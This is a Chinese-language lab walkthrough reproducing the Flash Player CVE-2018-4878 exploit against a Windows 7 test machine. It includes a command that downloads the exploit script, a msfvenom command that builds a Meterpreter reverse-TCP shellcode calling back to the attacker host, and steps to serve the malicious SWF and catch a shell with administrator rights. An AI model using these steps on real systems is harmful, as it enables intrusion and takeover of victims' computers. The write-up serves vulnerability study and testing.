0x01 前言
Adobe公司在去年2018年2月1日发布了一条安全公告:
https://helpx.adobe.com/security/products/flash-player/apsa18-01.html
公告称一个新的Flash 0Day漏洞(CVE-2018-4878)已经存在野外利用,可针对Windows用户发起定向攻击。攻击者可以诱导用户打开包含恶意 Flash 代码文件的 Microsoft Office 文档、网页、垃圾电子邮件等。
0x02 漏洞影响
Flash Player当前最新版本28.0.0.137以及之前的所有版本
0x03 漏洞复现
环境测试:
攻击机:kali
目标靶机:win7x64 IE8.0 FLASH player28.0.0.137
下载漏洞利用脚本:
wget https://raw.githubusercontent.com/backlion/demo/master/CVE-2018-4878.rar
可以看到漏洞利用的脚本和swf文件:
不过这里我们需要对exp脚本进行修改,原作者将代码中的stageless变量改成了true,正确的应该改成:stageless = False。链接是:https://github.com/anbai-inc/CVE-2018-4878
其次,需要修改替换原来的shellcode代码,我们用kali的msf生成shellcode:
kali:192.168.1.197
win7:192.168.1.105
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.197 lport=5678 -f python>shellcode.txt
替换:
将exp脚本放入kali下和index.html同一个目录下,生成恶意的swf文件,注意脚本下生成swf的目录是/opt/CVE-2018-4878,可以自定义修改目录
为了让win7访问恶意文件,我们开启kali的web服务,将swf文件放到www目录下:
在msf下监听:
开始进行监听之后,在win7上用ie打开197的80端口服务:
Shell回显过来了!
管理员权限:
0x04 漏洞修复
升级到最新版本即可